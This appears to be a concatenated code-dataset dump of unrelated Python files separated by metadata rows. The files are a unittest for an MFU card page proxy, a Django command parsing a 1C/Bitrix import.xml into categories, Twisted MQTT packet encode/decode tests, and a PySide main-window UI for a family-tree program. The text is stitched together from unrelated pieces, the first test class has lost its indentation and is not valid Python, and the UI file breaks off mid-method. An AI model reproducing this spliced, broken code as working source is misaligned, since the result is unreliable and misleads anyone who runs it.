class MFUPageViewProxyTests(unittest.TestCase):
def __init__(self, name):
super().__init__(name)
self.card = MFUCard()
def test_length(self):
self.assertEqual(len(self.card.pages), 16)
def test_pages_proxy(self):
self.assertIsInstance(self.card.pages, MFUPageViewProxy)
def test_page_by_index(self):
self.assertIsInstance(self.card.pages[0], MFUPage)
self.assertIs(self.card.pages[-1], self.card.pages[15])
def test_pages_by_slice(self):
pages = self.card.pages[:2]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 2)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[10:]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 6)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[8:10]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 2)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[10:8:-1]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 2)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
pages = self.card.pages[:1]
self.assertIsInstance(pages, list)
self.assertEqual(len(pages), 1)
self.assertTrue(all(isinstance(p, MFUPage) for p in pages))
def test_page_by_invalid_index(self):
with self.assertRaises(IndexError):
self.card.pages[16]
for t in (object, str, float, complex, bytes, bytearray):
with self.assertRaises(TypeError):
self.card.pages[t()]
def test_page_iterator(self):
iterable = iter(self.card.pages)
item = next(iterable)
self.assertIsInstance(item, MFUPage)
self.assertIs(item, self.card.pages[0])
items = list(iterable)
self.assertEqual(len(items), 15)
for i, p in enumerate(items):
self.assertIs(p, self.card.pages[i + 1])
def test_set_page_from_int(self):
self.card.pages[0] = 0x11223344
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
def test_set_page_from_bytes(self):
self.card.pages[0] = bytes([0x11, 0x22, 0x33, 0x44])
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
self.card.pages[0] = b'\x55\x66\x77\x88'
self.assertEqual(self.card.pages[0].to_int(), 0x55667788)
self.assertEqual(self.card.pages[0].to_hex(), '55667788')
def test_set_page_from_bytearray(self):
self.card.pages[0] = bytearray([0x11, 0x22, 0x33, 0x44])
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
def test_set_page_from_string(self):
self.card.pages[0] = '\x11\x22\x33\x44'
self.assertEqual(self.card.pages[0].to_int(), 0x11223344)
self.assertEqual(self.card.pages[0].to_hex(), '11223344')
def test_set_page_with_invalid_value(self):
for t in (object, complex, float, dict, set, list, tuple):
with self.assertRaises(ValueError):
self.card.pages[0] = t()
with self.assertRaises(ValueError):
self.card.pages[0] = None
def test_set_page_with_invalid_int_index(self):
with self.assertRaises(IndexError):
self.card.pages[len(self.card.pages)] = 0
def test_set_page_with_invalid_index(self):
for t in (str, object, complex, float, dict, set, list, tuple):
with self.assertRaises(TypeError):
self.card.pages[t()] = 0
def test_set_page_slices_unsupported(self):
with self.assertRaises(NotImplementedError):
self.card.pages[:2] = [0, 0]
if __name__ == '__main__':
    unittest.main()
|
lgpl-3.0
| -3,854,851,223,214,129,000
| 29.743377
| 79
| 0.557865
| false
| 3.372503
| true
| false
| false
|
AlexStarov/Shop
|
applications/bitrix/management/commands/1cbitrix.py
|
1
|
12839
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
import xml.etree.ElementTree as ET
from time import sleep
import os
from applications.product.models import Category
__author__ = 'AlexStarov'
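# Tag glossary for the import.xml parsed below (English translations of the
# Russian element names; the literals themselves must stay as-is to match the
# 1C/Bitrix exchange file):
#   'Классификатор' = Classifier, 'Каталог' = Catalogue, 'Группы' = Groups,
#   'Группа' = Group, 'Товары' = Products, 'Товар' = Product,
#   'Ид' = Id, 'Наименование' = Name, 'Артикул' = SKU / article number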
def search_in_category(name, id_1c, parent=None, ):
try:
cat = Category.objects.get(title=name, id_1c=id_1c, parent=parent)
return cat
except Category.DoesNotExist:
cat = Category()
cat.title = name
if parent:
cat.parent = parent
cat.id_1c = id_1c
# cat.save()
return None
except Category.MultipleObjectsReturned:
cats = Category.objects.filter(title=name, id_1c=id_1c, parent=parent)
if len(cats) > 1:
            raise Category.MultipleObjectsReturned('MultiCat')
elif len(cats) == 1:
return cats[0]
elif len(cats) == 0:
try:
cat = Category.objects.get(title=name, parent=parent)
except Category.DoesNotExist:
cat = Category()
cat.title = name
if parent:
cat.parent = parent
cat.id_1c = id_1c
# cat.save()
return None
class Command(BaseCommand, ):
from optparse import make_option
option_list = BaseCommand.option_list + (
make_option('--id', '--pk', '--delivery_id', '--delivery_pk',
action='store', type='int', dest='delivery_pk',
help=''),
make_option('--t', '--delivery_test', '--test',
action='store_true', dest='delivery_test',
help=''),
make_option('--g', '--delivery_general', '--general',
action='store_true', dest='delivery_test',
help=''),
)
#self.verbosity = int(options.get('verbosity'))
#def add_arguments(self, parser):
# parser.add_argument('delivery_id', nargs='+', type=int)
def handle(self, *args, **options):
cwd = os.getcwd()
cwd = os.path.join(cwd, 'db')
for name in os.listdir(cwd):
path_and_filename = os.path.join(cwd, name)
if os.path.isfile(path_and_filename, ) and name == 'import.xml':
root = ET.parse(source=path_and_filename).getroot()
for elem_level1 in root:
# print 'level1', elem_level1, elem_level1.tag, elem_level1.attrib, elem_level1.text
if elem_level1.tag == u'Классификатор':
elems_level1 = list(elem_level1)
for elem_level2_Indx, elem_level2 in enumerate(elems_level1):
# print 'level2', elem_level2_Indx, elem_level2, elem_level2.tag, elem_level2.attrib, elem_level2.text
if elem_level2.tag == u'Наименование'\
and elem_level2.text == u'Классификатор (Каталог товаров)'\
and elems_level1[elem_level2_Indx+1].tag == u'Группы':
elems_level2 = list(elems_level1[elem_level2_Indx+1])
for elem_level3_Indx, elem_level3 in enumerate(elems_level2):
# print 'level3', elem_level3_Indx, elem_level3, elem_level3.tag, elem_level3.attrib, elem_level3.text
elems_level3 = list(elem_level3)
for elem_level4_Indx, elem_level4 in enumerate(elems_level3):
# print 'level4', elem_level4_Indx, elem_level4, elem_level4.tag, elem_level4.attrib, elem_level4.text
if elem_level4.tag == u'Наименование' \
and elem_level4.text == u'Товары' \
and elems_level3[elem_level4_Indx + 1].tag == u'Группы':
elems_level4 = list(elems_level3[elem_level4_Indx + 1])
for elem_level5_Indx, elem_level5 in enumerate(elems_level4):
# print 'level5', elem_level5_Indx, elem_level5, elem_level5.tag, elem_level5.attrib, elem_level5.text
if elem_level5.tag == u'Группа':
try:
elems_level5 = list(elems_level4[elem_level5_Indx])
for elem_level6_Indx, elem_level6 in enumerate(elems_level5):
# print 'level6', elem_level6_Indx, elem_level6, elem_level6.tag, elem_level6.attrib, elem_level6.text
if elem_level6.tag == u'Ид' and elems_level5[elem_level6_Indx + 1].tag == u'Наименование':
dict_elem_level6 = {'Id': elem_level6.text, 'Name': elems_level5[elem_level6_Indx + 1].text, }
parent_cat6 = search_in_category(name=dict_elem_level6['Name'], id_1c=dict_elem_level6['Id'])
#print 'level6: ', dict_elem_level6, parent_cat6
if elem_level6.tag == u'Группы':
elems_level6 = list(elems_level5[elem_level6_Indx])
for elem_level7_Indx, elem_level7 in enumerate(elems_level6):
# print 'level7', elem_level7_Indx, elem_level7, elem_level7.tag, elem_level7.attrib, elem_level7.text
if elem_level7.tag == u'Группа':
try:
elems_level7 = list(elems_level6[elem_level7_Indx])
for elem_level8_Indx, elem_level8 in enumerate(elems_level7):
# print 'level8', elem_level8_Indx, elem_level8, elem_level8.tag, elem_level8.attrib, elem_level8.text
if elem_level8.tag == u'Ид' and elems_level7[elem_level8_Indx + 1].tag == u'Наименование':
dict_elem_level8 = {'Id': elem_level8.text, 'Name': elems_level7[elem_level8_Indx + 1].text, }
parent_cat8 = search_in_category(name=dict_elem_level8['Name'], id_1c=dict_elem_level8['Id'], parent=parent_cat6)
#print 'level6: ', dict_elem_level6, parent_cat8
if elem_level8.tag == u'Группы':
elems_level8 = list(elems_level7[elem_level8_Indx])
for elem_level9_Indx, elem_level9 in enumerate(elems_level8):
# print 'level9', elem_level9_Indx, elem_level9, elem_level9.tag, elem_level9.attrib, elem_level9.text
if elem_level9.tag == u'Группа':
try:
elems_level9 = list(elems_level8[elem_level9_Indx])
for elem_level10_Indx, elem_level10 in enumerate(elems_level9):
# print 'level10', elem_level10_Indx, elem_level10, elem_level10.tag, elem_level8.attrib, elem_level10.text
if elem_level10.tag == u'Ид' and elems_level9[elem_level10_Indx + 1].tag == u'Наименование':
dict_elem_level10 = {'Id': elem_level10.text, 'Name': elems_level9[elem_level10_Indx + 1].text, }
parent_cat10 = search_in_category(name=dict_elem_level10['Name'], id_1c=dict_elem_level10['Id'], parent=parent_cat8)
#print 'level6: ', dict_elem_level6, parent_cat10
if elem_level10.tag == u'Группы':
level10 = True
except IndexError:
pass
except IndexError:
pass
except IndexError:
pass
if elem_level1.tag == u'Каталог':
elems_level1 = list(elem_level1)
for elem_level2_Indx, elem_level2 in enumerate(elems_level1):
print('level2', elem_level2_Indx, elem_level2, elem_level2.tag, elem_level2.attrib, elem_level2.text, )
if elem_level2.tag == u'Наименование' \
and elem_level2.text == u'Каталог товаров' \
and elems_level1[elem_level2_Indx + 1].tag == u'Товары':
elems_level2 = list(elems_level1[elem_level2_Indx + 1])
for elem_level3_Indx, elem_level3 in enumerate(elems_level2):
# print 'level3', elem_level3_Indx, elem_level3, elem_level3.tag, elem_level3.attrib, elem_level3.text
if elem_level3.tag == u'Товар':
elems_level3 = list(elem_level3)
for elem_level4_Indx, elem_level4 in enumerate(elems_level3):
# print 'level4', elem_level4_Indx, elem_level4, elem_level4.tag, elem_level4.attrib, elem_level4.text
if elem_level4.tag == u'Ид':
id_1c_prod = elem_level4.text
if elems_level3[elem_level4_Indx + 1].tag == u'Артикул':
articul = elems_level3[elem_level4_Indx + 1].text
if elems_level3[elem_level4_Indx + 2].tag == u'Наименование':
name = elems_level3[elem_level4_Indx + 2].text
if elem_level4.tag == u'Группы':
elems_level4 = list(elems_level3[elem_level4_Indx])
for elem_level5_Indx, elem_level5 in enumerate(elems_level4):
# print 'level5', elem_level5_Indx, elem_level5, elem_level5.tag, elem_level5.attrib, elem_level5.text
if elem_level5.tag == u'Ид':
id_1c_cat = elem_level5.text
if 'level10' in locals():
print('level10', )
|
apache-2.0
| -4,928,253,206,802,143,000
| 60.794118
| 220
| 0.399889
| false
| 4.497324
| false
| false
| false
|
astrorafael/twisted-mqtt
|
mqtt/test/test_pdu.py
|
1
|
20218
|
# ----------------------------------------------------------------------
# Copyright (C) 2015 by Rafael Gonzalez
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ----------------------------------------------------------------------
from twisted.trial import unittest
from twisted.test import proto_helpers
from mqtt import v31, v311
from mqtt.pdu import (
CONNECT,
CONNACK,
DISCONNECT,
PINGREQ,
PINGRES,
SUBSCRIBE,
SUBACK,
UNSUBSCRIBE,
UNSUBACK,
PUBLISH,
PUBACK,
PUBREC,
PUBREL,
PUBCOMP,
)
class PDUTestCase(unittest.TestCase):
def test_CONNECT_encdec(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.version = v31
request.keepalive = 0
request.willTopic = None
request.willMessage = None
request.willQoS = None
request.willRetain = None
request.username = None
request.password = None
request.cleanStart = True
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_keepalive(self):
request = CONNECT()
response = CONNECT()
request.version = v31
request.clientId = "client-foo"
request.keepalive = 12
request.willTopic = None
request.willMessage = None
request.willQoS = None
request.willRetain = None
request.username = None
request.password = None
request.cleanStart = True
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
self.assertEqual(request.version, response.version)
def test_CONNECT_encdec_willTopic(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 1
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_willMessage(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = "Hello World"
request.willQoS = 2
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_willRetain(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1
request.willTopic = "foo-topic"
request.willMessage = "Hello World"
request.willQoS = 2
request.willRetain = True
request.username = None
request.password = None
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_userpass(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 12000
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 0
request.willRetain = False
request.username = "foouser"
request.password = "foopasswd"
request.cleanStart = True
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password.decode(encoding='ascii', errors='ignore'))
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_session(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 1200
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 1
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = False
request.version = v31
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_CONNECT_encdec_version(self):
request = CONNECT()
response = CONNECT()
request.clientId = "client-foo"
request.keepalive = 120
request.willTopic = "foo-topic"
request.willMessage = ""
request.willQoS = 0
request.willRetain = False
request.username = None
request.password = None
request.cleanStart = True
request.version = v311
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.version, response.version)
self.assertEqual(request.clientId, response.clientId)
self.assertEqual(request.keepalive, response.keepalive)
self.assertEqual(request.willTopic, response.willTopic)
self.assertEqual(request.willMessage, response.willMessage)
self.assertEqual(request.willQoS, response.willQoS)
self.assertEqual(request.willRetain, response.willRetain)
self.assertEqual(request.username, response.username)
self.assertEqual(request.password, response.password)
self.assertEqual(request.cleanStart, response.cleanStart)
def test_PINGREQ_encdec(self):
request = PINGREQ()
response = PINGREQ()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_PINGRES_encdec(self):
request = PINGRES()
response = PINGRES()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_DISCONNECT_encdec(self):
request = DISCONNECT()
response = DISCONNECT()
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
def test_CONNACK_encdec(self):
request = CONNACK()
response = CONNACK()
request.session = True
request.resultCode = 2
response.decode(request.encode())
self.assertEqual(request.encoded[0], response.encoded[0])
self.assertEqual(request.session, response.session)
self.assertEqual(request.resultCode, response.resultCode)
def test_SUBSCRIBE_encdec(self):
request = SUBSCRIBE()
response = SUBSCRIBE()
        request.topics = [('foo', 1), ('bar', 0), ('baz', 2)]
request.msgId = 5
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_SUBACK_encdec(self):
request = SUBACK()
response = SUBACK()
request.msgId = 5
        request.granted = [(0, False), (0, True), (1, False), (1, True), (2, False), (2, True)]
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.granted, response.granted)
def test_UNSUBSCRIBE_encdec(self):
request = UNSUBSCRIBE()
response = UNSUBSCRIBE()
request.topics = ['foo', 'bar', 'baz']
request.msgId = 6
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.topics, response.topics)
def test_UNSUBACK_encdec(self):
request = UNSUBACK()
response = UNSUBACK()
request.msgId = 5
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBACK_encdec(self):
request = PUBACK()
response = PUBACK()
request.msgId = 65535
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREC_encdec(self):
request = PUBREC()
response = PUBREC()
request.msgId = 30001
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBREL_encdec(self):
request = PUBREL()
response = PUBREL()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBCOMP_encdec(self):
request = PUBCOMP()
response = PUBCOMP()
request.msgId = 30002
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
def test_PUBLISH_encdec(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = None
request.qos = 0
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_qos(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_dup(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = True
request.retain = False
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_retain(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = "foo"
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_str(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = ""
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload.decode(encoding='utf-8'))
def test_PUBLISH_encdec_payload_bytearray(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = bytearray(5)
response.decode(request.encode())
self.assertEqual(request.msgId, response.msgId)
self.assertEqual(request.qos, response.qos)
self.assertEqual(request.dup, response.dup)
self.assertEqual(request.retain, response.retain)
self.assertEqual(request.topic, response.topic)
self.assertEqual(request.payload, response.payload)
class PDUTestCase2(unittest.TestCase):
    def test_PUBACK_enc_fail1(self):
        # msgId below the valid 16-bit range must be rejected
        request = PUBACK()
        request.msgId = -1
        self.assertRaises(ValueError, request.encode)
    def test_PUBACK_enc_fail2(self):
        # msgId above 65535 cannot be encoded in two bytes
        request = PUBACK()
        request.msgId = 2000000
        self.assertRaises(ValueError, request.encode)
def test_PUBLISH_encdec_payload_int(self):
request = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 65537
self.assertRaises(TypeError, request.encode)
def test_PUBLISH_encdec_payload_float(self):
request = PUBLISH()
response = PUBLISH()
request.msgId = 30001
request.qos = 1
request.dup = False
request.retain = True
request.topic = "foo"
request.payload = 12.25
self.assertRaises(TypeError, request.encode)
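# Hedged sketch of the round-trip idiom every encdec test above repeats:
# populate a PDU, encode() it to wire bytes, then decode() those bytes into
# a fresh instance and compare fields. The helper name and field values are
# illustrative; CONNECT and v311 are the same objects the tests exercise.
def _connect_roundtrip_sketch():
    request, response = CONNECT(), CONNECT()
    request.clientId = "client-foo"
    request.keepalive = 60
    request.willTopic = "foo-topic"
    request.willMessage = "bye"
    request.willQoS = 0
    request.willRetain = False
    request.username = None
    request.password = None
    request.cleanStart = True
    request.version = v311
    response.decode(request.encode())
    assert response.clientId == request.clientId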
|
mit
| 5,394,915,169,349,317,000
| 38.565558
| 106
| 0.633594
| false
| 4.086095
| true
| false
| false
|
DayGitH/Family-Tree
|
mainwindow1.py
|
1
|
7475
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '.\mainwindow.ui'
#
# Created: Wed Dec 17 21:45:47 2014
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(640, 480)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Maximum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(MainWindow.sizePolicy().hasHeightForWidth())
MainWindow.setSizePolicy(sizePolicy)
MainWindow.setIconSize(QtCore.QSize(32, 32))
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtGui.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.graphicsView = QtGui.QGraphicsView(self.centralwidget)
self.graphicsView.setResizeAnchor(QtGui.QGraphicsView.AnchorUnderMouse)
self.graphicsView.setObjectName("graphicsView")
self.gridLayout.addWidget(self.graphicsView, 0, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 640, 21))
self.menubar.setObjectName("menubar")
self.menuFile = QtGui.QMenu(self.menubar)
self.menuFile.setObjectName("menuFile")
self.menu_New = QtGui.QMenu(self.menuFile)
self.menu_New.setObjectName("menu_New")
self.menuEdit = QtGui.QMenu(self.menuFile)
self.menuEdit.setObjectName("menuEdit")
self.menuTrees = QtGui.QMenu(self.menubar)
self.menuTrees.setObjectName("menuTrees")
self.menuAbout = QtGui.QMenu(self.menubar)
self.menuAbout.setObjectName("menuAbout")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionNew_Person = QtGui.QAction(MainWindow)
self.actionNew_Person.setObjectName("actionNew_Person")
self.actionNew_Relationship = QtGui.QAction(MainWindow)
self.actionNew_Relationship.setObjectName("actionNew_Relationship")
self.actionEdit_Person = QtGui.QAction(MainWindow)
self.actionEdit_Person.setObjectName("actionEdit_Person")
self.actionEdit_Relationship = QtGui.QAction(MainWindow)
self.actionEdit_Relationship.setObjectName("actionEdit_Relationship")
self.actionSave_Tree = QtGui.QAction(MainWindow)
self.actionSave_Tree.setObjectName("actionSave_Tree")
self.actionLoad_Tree = QtGui.QAction(MainWindow)
self.actionLoad_Tree.setObjectName("actionLoad_Tree")
self.actionNew_Tree = QtGui.QAction(MainWindow)
self.actionNew_Tree.setObjectName("actionNew_Tree")
self.actionExit = QtGui.QAction(MainWindow)
self.actionExit.setObjectName("actionExit")
self.actionDescendants = QtGui.QAction(MainWindow)
self.actionDescendants.setObjectName("actionDescendants")
self.actionHourglass = QtGui.QAction(MainWindow)
self.actionHourglass.setObjectName("actionHourglass")
self.actionPython = QtGui.QAction(MainWindow)
self.actionPython.setObjectName("actionPython")
self.actionPyside = QtGui.QAction(MainWindow)
self.actionPyside.setObjectName("actionPyside")
self.actionFamily_Tree = QtGui.QAction(MainWindow)
self.actionFamily_Tree.setObjectName("actionFamily_Tree")
self.menu_New.addAction(self.actionNew_Person)
self.menu_New.addAction(self.actionNew_Relationship)
self.menu_New.addAction(self.actionNew_Tree)
self.menuEdit.addAction(self.actionEdit_Person)
self.menuEdit.addAction(self.actionEdit_Relationship)
self.menuFile.addAction(self.menu_New.menuAction())
self.menuFile.addAction(self.menuEdit.menuAction())
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionSave_Tree)
self.menuFile.addAction(self.actionLoad_Tree)
self.menuFile.addSeparator()
self.menuFile.addAction(self.actionExit)
self.menuTrees.addAction(self.actionDescendants)
self.menuTrees.addAction(self.actionHourglass)
self.menuAbout.addAction(self.actionPython)
self.menuAbout.addAction(self.actionPyside)
self.menuAbout.addAction(self.actionFamily_Tree)
self.menubar.addAction(self.menuFile.menuAction())
self.menubar.addAction(self.menuTrees.menuAction())
self.menubar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "My Family Tree", None, QtGui.QApplication.UnicodeUTF8))
self.menuFile.setTitle(QtGui.QApplication.translate("MainWindow", "File", None, QtGui.QApplication.UnicodeUTF8))
self.menu_New.setTitle(QtGui.QApplication.translate("MainWindow", "New", None, QtGui.QApplication.UnicodeUTF8))
self.menuEdit.setTitle(QtGui.QApplication.translate("MainWindow", "Edit", None, QtGui.QApplication.UnicodeUTF8))
self.menuTrees.setTitle(QtGui.QApplication.translate("MainWindow", "Trees", None, QtGui.QApplication.UnicodeUTF8))
